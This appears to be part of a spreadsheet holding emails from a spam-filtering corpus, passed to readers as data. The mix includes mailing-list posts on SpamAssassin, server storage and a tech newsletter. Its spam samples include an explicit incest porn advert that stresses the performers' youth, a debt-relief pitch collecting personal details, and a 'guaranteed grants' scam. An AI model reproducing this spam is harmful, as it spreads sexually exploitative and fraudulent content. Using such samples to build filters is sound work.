 considerable roadblocks, and Microsoft overtook Netscape in market
 share. 
 ----
 aDaM@XeNT.CoM -- .sig double play!
 We have done a great job of having teams work around the clock to
 deliver security fixes for any problems that arise. Our responsiveness
 has been unmatched - but as an industry leader we can and must do
 better... Going forward, we must develop technologies and policies that
 help businesses better manage ever larger networks of PCs, servers and
 other intelligent devices, knowing that their critical business systems
 are safe from harm. Systems will have to become self-managing and
 inherently resilient. We need to prepare now for the kind of software
 that will make this happen, and we must be the kind of company that
 people can rely on to deliver it. 
   -- Bill Gates, http://zdnet.com.com/2100-1104-817343.html
 The problem with SOAP is that it tries to escape from the Web interface.
 It deliberately attempts to suck, mostly because it is deliberately
 trying to supplant CGI-like applications rather than Web-like
 applications.  It is simply a waste of time for folks to say that "HTTP
 allows this because I've seen it used by this common CGI script."  If we
 thought that sucky CGI scripts were the basis for good Web
 architectures, then we wouldn't have needed a Gateway Interface to
 implement them.  In order for SOAP-ng to succeed as a Web protocol, it
 needs to start behaving like it is part of the Web.  That means, among
 other things, that it should stop trying to encapsulate all sorts of
 actions under an object-specific interface.  It needs to limit its
 object-specific behavior to those situations in which object-specific
 behavior is actually desirable.  If it does not do so, then it is not
 using URI as the basis for resource identification, and therefore it is
 no more part of the Web than SMTP.
   -- Roy Fielding, http://lists.w3.org/Archives/Public/www-tag/2002Apr/0181.html
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Customer, LIVE incest video from Russia!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;New amazing incest show on Hot-Babies-Live.Com&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=#000000 text=#000000 link=#000000 vlink=#000000 alink="#ff0000" topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 align=center width=700&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.hot-babies.com/limages/4/head.jpg" width="700" height="63" alt="Hot-Babies-Live" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=1 width=1 border=0&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 align=center width=700&gt;
 	&lt;tr&gt;
 		&lt;td width=276 bgcolor="#71227D"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=1 width=276 border=0&gt;&lt;/td&gt;
 		&lt;td width=1 bgcolor="#ffffff"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=1 width=1 border=0&gt;&lt;/td&gt;
 		&lt;td width=423 bgcolor="#DCDCDC"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=1 width=423 border=0&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td width=276 bgcolor="#71227D" align="center"&gt;
 		&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=5 width=1 border=0&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff"&gt;&lt;table cellpadding=5 cellspacing=1 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#DCDCDC"&gt;&lt;table cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;table cellpadding=0 cellspacing=1 border=0&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;img src="http://www.hot-babies.com/limages/4/photo1.jpg" width="246" height="181" alt="Janna" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 		&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=5 width=1 border=0&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=1 border=0 width="250"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Age: 18&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Height 165 cms&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Weight: 45 kg&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Hair Color: Brunette&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Eye Color: Blue&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Chest Size: 1&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;font color="#ffffff" face="Arial" size="2"&gt;Sexual Preference: Bi&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff"&gt;&lt;table cellpadding=5 cellspacing=1 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#DCDCDC"&gt;&lt;table cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;table cellpadding=0 cellspacing=1 border=0&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;img src="http://www.hot-babies.com/limages/4/photo2.jpg" width="246" height="181" alt="Natasha" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 		&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=5 width=1 border=0&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=1 border=0 width="250"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Age: 22&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Height 172 cms&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Weight: 50 kg&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Hair Color: Blonde&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Eye Color: Green&lt;/font&gt;&lt;/td&gt;
 					&lt;td&gt;&lt;font color="#ffffff" face="Arial" size="2"&gt;Chest Size: 2&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;font color="#ffffff" face="Arial" size="2"&gt;Sexual Preference: Bi&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 		&lt;/td&gt;
 		&lt;td width=1 bgcolor="#ffffff"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=1 width=1 border=0&gt;&lt;/td&gt;
 		&lt;td width=423 bgcolor="#DCDCDC" valign="top"&gt;&lt;img src='http://www.hot-babies.com/limages/4/1x1.gif' height=20 width=1 border=0&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
 						&lt;font color="#D10D01" face="Arial" size="4"&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;New amazing incest show&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;
 						&lt;br&gt;
 						&lt;font color="#D10D01" face="Arial" size="4"&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;on Hot-Babies-Live.Com&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;img src="http://www.hot-babies.com/limages/4/str.gif" width="423" height="4" alt="" border="0"&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=10 border=0&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
 						&lt;font color="#000000" face="Arial" size="2"&gt;
 &lt;p&gt;&lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Hot-Babies-Live.com&lt;/b&gt;&lt;/a&gt; is a new porno site where you can see porno show in real time.&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Hot-Babies-Live.com&lt;/b&gt;&lt;/a&gt; presents you a unique chance to manage a private show with a real time live video chat according to your personal erotic fantasies.&lt;/p&gt;
 &lt;p&gt;Now &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Hot-Babies-Live.com&lt;/b&gt;&lt;/a&gt; has organized a new show. All your sexual wishes will be fulfilled in real time by two sisters from Russia, Janna and Natasha. They are not only real sisters, they are the youngest models in &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Hot-Babies-Live.com&lt;/b&gt;&lt;/a&gt;!&lt;br&gt;Janna has just become 18! &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Click here to check it out!&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;They pet each other, lick each other and fuck each other when you ask. They will never refuse. They are always full of enthusiasm and desire. They will turn you on in minutes!&lt;/p&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;img src="http://www.hot-babies.com/limages/4/photo3.jpg" width="421" height="106" alt="Gallery" border="0"&gt;&lt;/a&gt;
 			&lt;table cellpadding=0 cellspacing=10 border=0&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
 						&lt;p align="justify"&gt;&lt;font color="#000000" face="Arial" size="2"&gt;
 						Now you can see their porno show and private recordings &lt;font color="#71227D" size="3"&gt;&lt;i&gt;absolutely free!&lt;/i&gt;&lt;/font&gt; &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;See their young sexuality by yourself!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 						If you are not a member of &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;&lt;b&gt;Hot-Babies-Live.com&lt;/b&gt;&lt;/a&gt; club, hurry up to &lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;join now&lt;/a&gt;.&lt;br&gt;&lt;br&gt;
 You can do it &lt;font color="#71227D" size="3"&gt;&lt;i&gt;cheaper than ever now!&lt;/i&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;font color="#ff0000"&gt;&lt;a href="http://a-email.newsletters.ckync.com/cgi-bin/click.pl?email=jm@netnoteinc.com&amp;newsletter=summer&amp;url=http://www.hot-babies-live.com"&gt;This offer is available for a limited time only!&lt;/a&gt;&lt;/font&gt;
 						&lt;/font&gt;&lt;/p&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" bgcolor="#0670C8" width=700 align=center&gt;
 		&lt;tr&gt;
 			&lt;td&gt;
 				&lt;blockquote&gt;
 					&lt;p&gt;This letter is NOT A SPAM! You have received it because your "&lt;a href="http://a-email.newsletters.ckync.com"&gt;A-Email NewsLetter&lt;/a&gt;" subscription is active. To check your subscription status or to unsubscribe, use this link:&lt;/p&gt;
 				&lt;/blockquote&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td align="right"&gt;&lt;a href="http://a-email.newsletters.ckync.com"&gt;&lt;i&gt;http://a-email.newsletters.ckync.com&lt;/i&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I may be dense, but why would anyone want to utilize Habeus?  To
 &gt; me, it looks like a potential backdoor to anyone's defenses against spam.
 You're not dense. I'm going to zero the habeas scores on my copy of
 SpamAssassin. I think they were added to SA quite prematurely. To me it's
 simple:
 1. People who send me legitimate email have absolutely no motivation to use
 Habeas, at least until it gets lots more press, and even then only
 bulk-mailing companies like Amazon or eBay are going to bother, and I
 already whitelist them. Individuals won't bother.
 2. Spammers have lots of motivation to forge the Habeas headers, and a good
 percentage of them are completely out of the legal reach of Habeas.
 I think it should be subjected to the same testing and scrutiny as any other
 potential new rule. When I test against my corpus here's what I get:
 OVERALL     SPAM  NONSPAM     S/O   SCORE  NAME
   13851     8919     4932    0.64    0.00  (all messages)
       0        0        0    0.00   -1.00  HABEAS_SWE
 The score of -1.0 is pretty harmless right now, but it still looks like a
 useless rule so far.
 --
 Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
 "Never interrupt your enemy when he is making a mistake." --Napoleon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</si>
  <si>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At Fermi (yes I'm back there; long story), we're buying 4U systems like 
 the fiscal year is ending.  We have ~20 ASA IR4US1 systems (not pushing 
 them, there are some other similar units available), with 60 more on 
 order.  They're 2-1/2 TB for $10K, although we add a separate IDE or 
 SCSI system disk, because the 3Ware RAID controllers can saturate. 
 Intel SDS2 motherboard, 2 1.4GHz P3s, 2 GB ram, 2 3Ware 7850 Raid 
 controllers, 16 160GB Maxtors, SysKonnect gigabit enet, Fermi RedHat 7.3.
 http://www.asacomputers.com/cgi-bin/index.fcg?action=displayscreen&amp;templateid=25
 There's some interesting info at:
 http://mit.fnal.gov/~msn/cdf/caf/server_evaluation.html
 We've decided to go with XFS (which Linus has just merged into the 2.5 
 tree), mostly because none of the other journaled fs's can maintain &gt;30 
 GB/s rates with a nearly full filesystem (mostly GB files) with random 
 deletions (we use these systems for caching our 2 petabyte tape store). 
   Ext3 almost did it but dropped from from ~38MB/s to 10 with random 
 deletions, and didn't want to do direct io at all.  Only concern is an 
 occasional system lock-up we haven't chased down yet.  A load avg &gt; 100 
 is always a patio of fun.
 Oddly, even fairly beefy systems like these will breathe hard to keep up 
 with the new STK 9940B tape drives, which crank along at a steady 
 30GB/s.  And you oldforktimers will remember "doofus" my old file server 
 system.  It would only take 2.1" of rackspace now, instead of 14 racks.
 Cheers,
 Wayne
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Removing SPAM: from SA notice
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Christopher Crowley" said:
 &gt; That says that every line is prefixed with "SPAM: ". Could you
 &gt; explain how to configure that in 10_misc.cf or in local.cf ?
 The problem with the "SPAM: " prefix, is that it's required for
 spamassassin -d (removing SpamAssassin markup) to work correctly.
 --j.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</si>
  <si>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&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020715.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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href="http://www.qksrv.net/click-471546-5924457"&gt;
 &lt;img src="http://www.qksrv.net/image-471546-5924457" width="468" height="60" alt="" border="0"&gt;&lt;/a&gt;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07.15.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;. 
 Keep the bad guys
 out of your PC or network with the advanced technology that's trusted by millions: 
 ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends
 your online privacy,and sets up in minutes. 
 &lt;a href="http://psstt.com/1/c/64021/63809/190955/190955"&gt;Click here to download now&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 As if there weren't enough hypocrisy and misinformation 
 being spewed by marketing and sales departments. This time, 
 a &lt;a href="http://idg.net/ic_886816_1794_9-
 10000.html"&gt;startling revelation&lt;/a&gt; that Microsoft refuses 
 to use their own ISA Server to protect themselves from the 
 very things the product is meant to stop - worms and 
 intrusion. Nimda was turned loose within Microsoft and 
 they've chosen NetScreen's 500 series security appliance to 
 cure what ills them. I find this staggeringly hilarious, to 
 say the least. The move is tantamount to Intel deploying 
 desktops based on AMD processors!
 &lt;p&gt;Ok, so a hardware solution might be better than a 
 software defense in many cases. I suppose we can't entirely 
 blame Microsoft for opting to go that route. Probably a wise 
 decision, in fact - admit defeat and move on. However, why 
 is Nimda spreading within the corporate walls to the point 
 that they felt the needed to make such a leap in the first 
 place? After all, patches were released months ago, so IIS 
 is impervious to attack now. Still considering the 
 deployment of IIS as your web server platform of choice? 
 Things that make you go hmmmm...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&lt;b&gt;SQL Server Install Leaves Passwords Behind&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/technet/security/bulletin/MS02-035.asp"&gt;http://www.microsoft.com/technet/security/bulletin/MS02-035.asp&lt;/a&gt;
 &lt;p&gt;During the installation of SQL Server 7.0 or 2000, 
 various bits of configuration information are stored in a 
 setup.iss file, including account passwords that have been 
 captured in order to configure the services. Prior to 
 certain service packs, these passwords are stored as clear 
 text, which is problematic because the file is left on the 
 hard drive after the installation process is completed. 
 Peruse the details of the bulletin to be sure you've cleaned 
 up any relevant bits and pieces applicable to your 
 environment.
 &lt;p&gt;&lt;br&gt;&lt;b&gt;SQL Server Cumulative Patch&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/technet/security/bulletin/MS02-034.asp"&gt;http://www.microsoft.com/technet/security/bulletin/MS02-034.asp&lt;/a&gt;
 &lt;p&gt;A new roll-up patch is available for SQL Server that takes 
 care of all previous security issues, plus a trio of new 
 items. Two buffer overrun vulnerabilities exist that could 
 allow an attacker to gain control over the server, and a 
 different privilege elevation flaw can be exploited due to 
 improper permissions within the registry. All three are 
 spackled over by the latest cumulative patch described 
 further in this bulletin.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Win2K Memory Allocation Adjustments&lt;/b&gt;
 &lt;br&gt;Unearthed by Wayne Clark
 &lt;p&gt;&lt;a class="url" href="http://searchwin2000.techtarget.com/tip/0,289483,sid1_gci835208,00.html"&gt;http://searchwin2000.techtarget.com/tip/0,289483,sid1_gci835208,00.html&lt;/a&gt;
 &lt;p&gt;Most Windows 2000 servers tune themselves fairly well and 
 do not need further tweaking. In those cases, it's best to 
 just leave things alone unless you specifically identify a 
 problem somewhere. Serdar Yegulalp has an excellent 
 explanation of one particular situation where memory pools 
 can be exhausted and crash the server. Before you go diving 
 into the registry to play with the knobs and buttons, be 
 certain you know what you're messing with or you could just 
 make things worse. Backups, backups, backups.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q325582"&gt;Q325582 - FIX: Output Data Overwritten When Input Data Is Larger than Destination Field (Q325582)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q305356"&gt;Q305356 - Windows XP Prompts You to Re-activate After You Restore Your Computer (Q305356)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q304622"&gt;Q304622 - CAPS LOCK Key Behavior with 16-Bit VDM Is Incorrect for French MultiLanguage Versions of Windows (Q304622)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q235063"&gt;Q235063 - Error C00D0035 Using Windows Media Player (Q235063)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q277843"&gt;Q277843 - FIX: Restore of Log in Standby Mode May Cause 9004 Error Message if the Original Database has Shrink Enabled (Q277843)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Sorting IP Addresses Via Script&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.i386.com/Default.asp?page=docs/scripting-ip2long.htm&amp;category=admin&amp;id=1046"&gt;http://www.i386.com/Default.asp?page=docs/scripting-ip2long.htm&amp;category=admin&amp;id=1046&lt;/a&gt;
 &lt;p&gt;Documentation is everything. If you have a handle on your 
 network configuration, it's much easier to manage. IP 
 addresses are one bit of information that must be properly 
 tracked, but often it's a manual effort to enter and sort 
 data. Using the script techniques provided in this brief 
 article, you can convert an address to a 32-bit number, 
 perform the sort, then convert back to the standard dotted 
 decimal format. An Excel sample spreadsheet is also provided 
 to get you started.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Broadband Sharing Crackdown&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1033-942323.html"&gt;http://news.com.com/2100-1033-942323.html&lt;/a&gt;
 &lt;p&gt;Those of us with wireless networking equipment might be 
 tempted to allow the neighbors to share the wealth, but be 
 careful. Broadband companies are catching on and putting a 
 stop to the practice. What's concerning to me is that I 
 don't share my wireless network, but I do use quite a few 
 different machines at any given time. If someone is snooping 
 around and seeing a lot of different sessions and gets 
 curious, might I be subject to a teeth-kicking?
 &lt;p&gt;
 &lt;b&gt;Virtual Sketching&lt;/b&gt;
 &lt;br&gt;Discovered by Diana
 &lt;p&gt;&lt;a class="url" href="http://members.bellatlantic.net/~vze2mfh8/"&gt;http://members.bellatlantic.net/~vze2mfh8/&lt;/a&gt;
 &lt;p&gt;I believe I still have an old Etch-A-Sketch in a box 
 somewhere. Maybe I should dig it back out and webify the 
 thing just for grins. Check out this example of novelty web 
 programming, assuming y'all don't kill the site. If it's 
 down, check back later. Using a web form, you can enter the 
 moves you'd like to see represented on the pad, which is 
 viewed through a live webcam. I'd love to see someone craft 
 the Lockergnome logo. Impress me...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href="http://www.lockergnome.com/issues/techspecialist/20020715.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020715.html&lt;/a&gt;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</si>
  <si>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Do you have enough money for all your bills? [qmpyq]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Are you in debt for $4,000 or more?
 Are you tired of being overwhelmed by your bills?
 Feeling as if is there nothing you can do about it?
 Do you have too many credit cards?
 We can help you get out of debt without another loan!
 We make Debt a thing of the Past!
 We offer hope and help to put you back on track with your finances!
 We are here to help!
 You don't have to be a homeowner!
 Your past credit history does not matter!
 You have nothing to lose and everything to gain!
  For a FREE Consultation  
  Please provide the following information.
  Full Name: 
  Address: 
  City: 
  State: 
  Zip Code: 
  Home Phone:
  Work Phone: 
  Best Time to Call: 
  E-Mail Address: 
  Estimated Debt Size: 
  (All information is kept securely and never
   provided to any third party sources)
 To no longer receive this message reply with the word - remove - in the e-mail subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [GHSclassof1977] Boneheads
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Everyone,
 There seem to be several "boneheads" in our class. A few months ago I 
 ran into John Dahill, he asked me if I would go to the reunion picnic 
 with him. His girlfriend and my guyfriend wouldn't know anyone there, 
 so I said yes. Yesterday he told me he can't go!! All this time he 
 thought it was on Saturday!! Oh well, I will see everyone there 
 sometime through the afternoon.
 Wendy Downs
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Free $5 Love Reading
 Risk Free!
 http://us.click.yahoo.com/NsdPZD/PfREAA/Ey.GAA/vUjolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 GHSclassof1977-unsubscribe@yahoogroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
